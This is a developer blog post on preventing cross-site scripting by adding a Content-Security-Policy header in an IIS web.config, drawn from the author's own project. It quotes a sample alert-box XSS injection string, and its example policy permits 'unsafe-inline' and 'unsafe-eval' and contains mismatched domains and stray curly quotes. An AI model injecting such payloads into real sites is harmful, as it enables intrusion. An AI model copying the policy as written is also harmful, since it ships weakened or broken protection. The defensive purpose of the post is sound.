Prevent XSS Exploits - Content Security Policy Header

Ahh XSS exploits. A nice buzzword in security conferences and classes. It sounds so cool and mysterious with the X in the front. But what is it really? How can it possibly harm my site and my users.

It is actually pretty simple when it comes down to it. A malicious user is able to inject JavaScript onto a site you are responsible for maintaining. And with the tools out there, it is pretty easy to basically take over a user's machine.

At most security training and conferences the expert will show you how to popup an alert window using something like this:

<script>alert('hello gov!');</script>  

While neat to show, it appears fairly harmless. When a malicious user exploits XSS on your site they are doing it to download a script file onto a users machine. Most likely this is because most textboxes only allow users to enter in say 50 characters. Not a whole lot can be done in 50 characters. Except download a file. What could that possible do? Well, a fun tool to mess around with is the BeEF framework to give you a small taste of what is possible. This Video will show you some of the possible damage which can be done.

So what can we do to mitigate this problem?

Browsers have added functionality to help us help ourselves. That functionality has existed for years, we just haven't taken advantage of it.

One feature can be activated by adding the "content-security-policy" header to any responses coming from the UI. This creates a white-list of acceptable sources. It also prevents inline styles and JavaScript from running. If your application needs those don't worry you can add the keyword 'unsafe-inline' to allow inline styles and JavaScript

It is easy to add it to your response headers via the web.config. Here is an example.

  <system.webServer>
    <httpProtocol>
      <customHeaders>
        <add name=”Content-Security-Policy” value="default-src 'none';
                                                   script-src 'self' 'unsafe-inline' 'unsafe-eval';
                                                   style-src 'self' 'unsafe-inline';
                                                   connect-src 'self' 'unsafe-eval';
                                                   font-src 'self';
                                                   img-src 'self' *.mysite.com" />
        <add name=”X-Content-Security-Policy” value="default-src 'none';
                                                     script-src 'self' 'unsafe-inline' 'unsafe-eval';
                                                     style-src 'self' 'unsafe-inline';
                                                     connect-src 'self' 'unsafe-eval';
                                                     font-src 'self';
                                                     img-src 'self' *.fcsamerica.com” />
      </customHeaders>
    </httpProtocol>
  </system.webServer>

The duplicate header is because IE 11 requires an X- in front of it while Chrome does not. Fun!

What this is saying is:
- Don't allow anything by default - Only allow scripts to be loaded from current web site - Unsafe inline and unsafe eval allow the styles and inline scripts to be executed by self - Only allow styles to be loaded from current web site - Unsafe inline allows inline CSS styles - Only allow connections to go back to current web site - Only allow fonts to be loaded from current web site - Only allow images to be loaded from current web site and anything in the *.myite.com domain. In the case of the company I work for, this was needed for employee pictures

Basically any HTML tag where you can specify a src file you can setup a white list for. That list is including, but not limited to:

  • JavaScript files
  • CSS Files
  • Images

I prefer blacklisting everything and then adding in exceptions. The number of acceptable sources is far less than the number of bad sources. This has an added bonus of finding extra dependencies you might not even be aware of.

After adding the headers to the application my team and I are responsible for it was interesting to see the fallout. And by interesting I mean annoying because stuff that used to work suddenly stopped working.

  • Visual Studio Browser Link stopped working, so that needed to be white listed
  • The web application connected to other services hosted by my company I did not know about, so those needed to be white listed
  • It required a fair amount of recursive testing to ensure nothing else was broken. Hopefully that is all automated. Let QA know this change is happening so they have an expectation their test runs might start failing until you tweak the white list.

What I am trying to say is this is not something that should be just slapped in. But it adds a good amount of security. If a malicious user is able to get XSS into your application the browser will not run attempt to download the file unless it is on your approved list.

The best approach would be to do this as early in your application's life as possible. In the case of the application my team and I are responsible for we added it about a year or so into the life of the application, which caused the need for regression testing. But in the end it was all worth it to make the site more secure.

Author image
About Bob Walker
Omaha, NE
Founder of CodeAperture.io. Principal Software Architect in Omaha, Nebraska. Friend of Redgate. Working as a Full Stack Developer since 2004.